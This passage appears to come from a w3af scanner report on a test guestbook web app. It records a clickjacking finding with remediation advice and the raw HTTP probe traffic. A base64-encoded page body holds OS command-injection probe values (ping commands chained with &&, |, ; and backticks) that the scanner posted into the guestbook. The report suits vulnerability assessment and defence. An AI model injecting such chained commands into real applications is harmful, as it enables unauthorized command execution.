ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+VGhyZWFkLlNsZWVwKDMwMDApOzwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD5UaHJlYWQuU2xlZXAoMzAwMCk7PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiYmcGluZyAtYyA0IGxvY2FsaG9z
dDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD4mJi91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsPC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnxwaW5nIC1uIDQg
bG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPnxwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnwvdXNyL3Ni
aW4vcGluZyAtcyBsb2NhbGg8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+O3BpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
O3BpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Oy91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhv
c3RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+cGluZyAtYyA0IGxvY2FsaG9zdDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vdXNyL3NiaW4v
cGluZyAtcyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41
NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD4mJnBpbmcgLW4gNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAg
ICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JiZwaW5nIC1jIDQgbG9j
YWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAg
ICAgIDxwPiYmL3Vzci9zYmluL3BpbmcgLXMgbG9jYWxob3N0IDQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHBpbmcgLW4gNCBsb2NhbGhv
c3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVs
bG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+
SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAg
PHA+fHBpbmcgLWMgNCBsb2NhbGhvc3Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fC91c3Ivc2Jpbi9waW5nIC1zIGxvY2FsaG9zdCA0PC9w
PgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjtw
aW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjU2PC9wPgogICAgICAgIDxwPjtwaW5nIC1jIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPjsvdXNyL3NiaW4vcGluZyAt
cyBsb2NhbGhvc3QgNDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAg
ICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD5gcGluZyAtbiA0IGxvY2FsaG9zdGA8L3A+CiAgICAgICAgPGhyIC8+CiAg
ICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+YHBpbmcgLWMgNCBsb2NhbGhvc3Rg
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxv
IFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxw
PnJ1biBwaW5nIC1uIDQgbG9jYWxob3N0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2
PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxw
PjwvcD4KICAgICAgICA8cD48L3A+CiAgICAgICAgPGhyIC8+Cg==
</body>
                </http-response>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[18, 49, 99, 100, 102, 126, 127, 168, 202, 205, 206, 207, 209, 210, 211, 212, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 228, 229, 230, 232, 233, 234, 235, 236, 237, 238, 239, 240, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 253, 257, 258, 260, 261, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 306, 307, 308, 309, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 326, 328, 329, 330, 332, 333, 334, 336, 338, 339, 340, 341, 342, 343, 345, 346, 347, 350, 352, 355, 357, 358, 361, 362, 363, 364, 366, 367, 375, 381, 385, 389, 409, 423, 427, 428, 430, 432, 435, 438, 440, 443, 457, 467, 480, 494, 518, 527, 528, 529, 530, 533, 535, 537, 584, 602, 618, 664, 701, 760, 762, 763, 775, 794, 802, 817, 826, 840, 841, 842, 845, 851, 854, 877, 885, 906, 912, 927, 932, 941, 949, 956, 968, 974, 984, 988, 1002, 1004, 1015, 1026]" method="GET" name="Click-Jacking vulnerability" plugin="click_jacking" severity="Medium" url="None" var="None">
        <description>The whole target has no protection (X-Frame-Options header) against Click-Jacking attacks.</description>
        <long-description>Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages.

The server didn't return an `X-Frame-Options` header which means that this website could be at risk of a clickjacking attack. The `X-Frame-Options` HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.</long-description>
        <fix-guidance>Configure your web server to include an X-Frame-Options header.</fix-guidance>
        <fix-effort>50</fix-effort>
        <references>
            <reference title="RFC-7034" url="http://tools.ietf.org/html/rfc7034"/>
            <reference title="Mozilla developer network" url="https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options"/>
            <reference title="OWASP Clickjacking document" url="https://www.owasp.org/index.php/Clickjacking"/>
        </references>
        <http-transactions>
            <http-transaction id="18">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="49">
                <http-request>
                    <status>PUT http://10.12.68.43:31337/RtzeV HTTP/1.1</status>
                    <headers>
                        <header content="6" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="text/plain" field="Content-type"/>
                    </headers>
                    <body content-encoding="text">sFeQyK</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="99">
                <http-request>
                    <status>GET http://10.12.68.43:31337/favicon.ico HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/favicon.ico&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="100">
                <http-request>
                    <status>GET http://10.12.68.43:31337/_vti_inf.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_inf.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="102">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ptgWm.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/ptgWm.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="126">
                <http-request>
                    <status>POST http://10.12.68.43:31337/_vti_bin/_vti_aut/author.dll HTTP/1.1</status>
                    <headers>
                        <header content="158" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWV0aG9kPXB1dCBkb2N1bWVudDo0LjAuMi40NzE1JnNlcnZpY2VfbmFtZT0mZG9jdW1lbnQ9W2Rv
Y3VtZW50X25hbWU9L3B0Z1dtLmh0bWw7bWV0YV9pbmZvPVtdXSZwdXRfb3B0aW9uPW92ZXJ3cml0
ZSZjb21tZW50PSZrZWVwX2NoZWNrZWRfb3V0PWZhbHNlCmxtdGgubVdndHA=
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/_vti_bin/_vti_aut/author.dll&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="127">
                <http-request>
                    <status>GET http://10.12.68.43:31337/server-status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="168">
                <http-request>
                    <status>GET http://10.12.68.43:31337/robots.txt HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/robots.txt&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="202">
